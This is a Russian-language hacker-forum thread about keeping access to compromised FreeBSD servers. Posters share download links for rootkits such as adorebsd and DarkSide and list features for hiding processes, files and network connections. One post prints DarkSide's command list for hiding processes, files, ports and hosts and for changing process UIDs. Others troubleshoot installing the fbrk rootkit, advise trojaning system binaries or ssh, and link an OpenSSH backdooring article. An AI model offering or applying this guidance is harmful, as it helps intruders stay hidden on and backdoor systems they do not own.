Трояним freeBSD

Discussion in 'Безопасность и Анонимность' started by zeppe1in, 12 Jul 2006.

  1. zeppe1in

    zeppe1in Elder - Старейшина

    Joined:
    12 Jul 2006
    Messages:
    343
    Likes Received:
    66
    Reputations:
    18
    как лучше закрепица на фряхе 4.8? фбрк вроде не катит. Какие есть идеи?
     
  2. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    http://www.eviltime.com/download/rootkit/adorebsd-0.34.tar.gz
     
    _________________________
  3. zeppe1in

    zeppe1in Elder - Старейшина

    Joined:
    12 Jul 2006
    Messages:
    343
    Likes Received:
    66
    Reputations:
    18
    А ты сам его юзал? как там с глюками? и ваще пойдёт для этой версии?
     
  4. MINDFLY

    MINDFLY Banned

    Joined:
    18 Jun 2006
    Messages:
    19
    Likes Received:
    3
    Reputations:
    -15
    FreeBSD rootkits

    Нужен хороший rootkit под FreeBSD. Кто что может посоветовать ?
     
    1 person likes this.
  5. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    На здоровье... :)
    _hxxp://www.google.ru/search?hl=ru&q=FreeBSD+rootkit+&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
     
  6. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    Вырезка из статьи Форба в журнале Хакер.
     
    #6 Desr0w, 26 Aug 2006
    Last edited by a moderator: 5 Apr 2007
  7. [hidden]

    [hidden] Elder - Старейшина

    Joined:
    5 Nov 2005
    Messages:
    70
    Likes Received:
    19
    Reputations:
    7
    Есть мнение, что в шестой ветке этот номер не пройдет
     
  8. MINDFLY

    MINDFLY Banned

    Joined:
    18 Jun 2006
    Messages:
    19
    Likes Received:
    3
    Reputations:
    -15
    Да вот в том то и дело ,что поиск ничего и не дал, поэтому то я и запостил в форум , думал то ли мне не везет, то ли ищу не правильно , пока не прочитал ответ Desr0w.
     
  9. MINDFLY

    MINDFLY Banned

    Joined:
    18 Jun 2006
    Messages:
    19
    Likes Received:
    3
    Reputations:
    -15
    2 Desr0w

    Да ! Вот только описываемы в вырезке руткиты я и нашел в инете и ничего более... Печально...
     
  10. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Я не знаю у тебя как версия freebsd! Но вот может поможет тебе:
     
  11. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Возможно, но только тем чтоб названия посматреть, т.к не одна ссылка там не работает... :)
     
    1 person likes this.
  12. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Окей спс за поправку. Вот сам руткит по ОС: freebsd(версия точно не знаю)
    Скачать
    Вот есть еще под FreeBSD rootkit precompiled binaries for 4.2-RELEASE
    Скачать
     
    #12 KPOT_f!nd, 2 Jan 2007
    Last edited: 2 Jan 2007
  13. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Один из посетителей 0x48k.cc под ником suspect поделился с нами информацией следующего характера:
    Ещё не разбирался, но из возможностей руткита стоит отметить:
    - сокрытие PID процесса и всех поражденных потомков
    - сокрытие файлов/каталогов, реализованное через модификацию данных inode, что позволяет сохранять скрытое состояние даже после перезагрузки системы/выгрузки руткита
    - сокрытие соединений
    - "пользовательский интерфейс" реализован через дополнительный syscall
    и т.д. стандартные функции. Пользуемся наздоровье, спасибо suspect за ссылку.

    Позже удалось выяснить что следует тщательно тестировать через ./necall, не делая make install. Стабильностью руткит не отличается, уходит в креш при сокрытии файла на FreeBSD 5.4, процессы скрывает некоторое время (~2 часа), потом также уходит в даун. И снова спасибо suspect'у. Я оттестировать не смог, т.к. спохмела загубил все разделы из Solaris(тестироват SinAR), включая FreeBSD 6.1 и Win XP. Так что звиняйте =) Позже теперь (жду когда придёт бесплатный CD с OpenSolaris =))
     
  14. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Меня тут спросили ещё по какие-нибудь руткиты для FreeBSD - рассказываю. От замечательной команды lbyte, которая, к сожалению, уже больше не существует, был такой релиз под названием DarkSide - RootKit для FreeBSD. О нём даже писали в каком-то из старых номеров журнала Хакер. Конечно, маловероятно, что он потянет под 5й и 6й веткой, но попытка не пытка, да и модификацию исходников ещё никто тоже не отменял. Скачать можно здесь: http://lbyte.void.ru/rel/files/darkside-0.2.3.tar.gz
    Лично тестировал на FreeBSD 4.6 где-то в 2003 году...
    Функционал стандартный:
    1)сокрытие процессов и их потомков
    2)сокрытие файлов и директорий
    3)сокрытие сетевых соединений путём модификасии TCP/IP стека.
    Использование:
    Code:
    hideproc <pid> - скрыть процесс, имеющий PID= <pid>
    unhideproc <pid> -  показать процесс с PID= <pid>
    printprocs - показать все скрытые процессы
    changeuid <pid> <uid> - изменить uid процесса с PID= <pid> на <uid>
    changeeuid <pid> <euid> - изменить euid процесса с PID= <pid> на <euid>
    changegid <pid> <gid> - изменить gid процесса с PID= <pid> на <gid>
    changeegid <pid> <egid>- изменить egid процесса с PID= <pid> на <egid>
    hidefile <name> - скрыть все файлы с именем <name>
    unhidefile <name> - показать все файлы с именем <name>
    printfiles - показать вс скрытые файлы
    hideport <num> - скрыть все соединения с портом <num>
    unhideport <num> - рыскрыть все соединения с портом <num>
    hidehost <ip> - скрыть все соединения с <ip>
    unhidehost <ip> - раскрыть все соединения <ip>
     
  15. Free

    Free Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    33
    Likes Received:
    2
    Reputations:
    -6
    под шестую фряху (release 6) что -то руткит не робит, подскажите может что -то не так делаю,

    вообщем запустил скрипт setup, и прописал троя в конфиге /dev/fd/.99/.ttyf00 и /dev/fd/.99/.ttyp00
     
    #15 Free, 19 Apr 2008
    Last edited by a moderator: 20 Apr 2008
  16. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Какой именно руткит? Какая версия? Подробности по поводу ветки.
     
  17. Free

    Free Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    33
    Likes Received:
    2
    Reputations:
    -6
    рут fbrk, версия 1(fbrk1). Ну есть еще и fbrk2. Вторую пока не пробывал запускать)))
     
  18. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Скорее всего fbrk впринципе не заработает. Предлагаю затроянить системные бнарники или ssh, например. Хотя, надо быть аккуратнее ибо способы не супер и требуют особой аккуратности.
     
  19. Free

    Free Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    33
    Likes Received:
    2
    Reputations:
    -6
    в качестве системных бинарников ты имеешь в виду каталог /etc/
     
  20. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    Free
    Читай: hellknights.void.ru/articles/0x48k-OpenSSH-backdooring.html
    От себя добавлю:
    forum.antichat.ru/thread62167.html :)